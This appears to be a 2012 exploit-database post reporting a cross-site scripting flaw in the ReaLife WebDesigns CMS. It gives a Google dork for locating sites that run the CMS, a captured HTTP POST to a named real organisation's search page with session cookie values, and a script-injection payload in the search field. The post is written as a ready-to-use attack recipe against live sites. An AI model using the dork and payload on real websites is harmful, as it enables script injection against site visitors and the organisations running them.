#############
# Exploit Title: ReaLife WebDesigns cms Cross Site Scripting Vulnerability
#
# Google Dork: intext:"Powered by: ReaLife WebDesigns"
#
# Date: 08/24/2012
#
# Author: Crim3R
#
# Vendor Home : http://www.realifewebdesigns.com/
#
# Tested on: all
#
###################################################################################
========================================
Http Headers / Host: www.cabrillomarineaquarium.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101
Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.cabrillomarineaquarium.org/resources/search.asp
Cookie: ASPSESSIONIDQSRSDCRS=PFCEHEMDILDBDGPPEDJDBJOK;
ASPSESSIONIDSSQSCDQT=MOOJMBBAGAGPNFENPEBAMMCD
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
POST DATA-------------------------------------------
searchtxt="><script>alert(0);</script>&Action=Search
searchtxt= HTML CODE HERE &Action=Search
D3M0 :
http://www.cabrilloXXquarium.org/resources/search.asp
===============Crim3R@Att.Net===========
$home = %00
thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir